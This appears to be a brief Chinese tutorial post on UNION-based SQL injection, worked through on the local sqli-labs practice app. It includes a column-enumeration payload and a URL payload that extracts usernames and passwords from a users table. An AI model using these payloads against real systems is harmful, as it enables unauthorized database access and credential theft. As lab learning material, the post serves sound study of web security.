码迷,mamicode.com
首页 > 其他好文 > 详细

union注入之select

时间:2021-06-02 11:12:14      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:master   inf   失效   info   alt   使用   mic   margin   输入   

  在sql注入中我们通常会使用这样一条语句来爆破字段:

id=-1 union select 1,2,3 --+    源代码: SELECT * FROM users WHERE id=-1 union select 1,2,3

  假如表的字段是三个,他会根据程序的设定来输出哪个字段。如果这时使用键值对来查询,而不是数组标号,就会提出一个问题:根据键值对查询出的结果还会是后面的那个表的结果吗,结果当然是肯定的。

当前面的id=-1 ,即前一个select失效后,查询的键值对会依次输入后面查询的值

echo ‘Your Login name:‘. $row[‘username‘];
echo ‘Your Password:‘ .$row[‘password‘];
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1‘union select 1, password,username from users where id =2--+

  技术图片

 

技术图片

 

union注入之select

标签:master   inf   失效   info   alt   使用   mic   margin   输入   

原文地址:https://www.cnblogs.com/jokdh/p/14812935.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!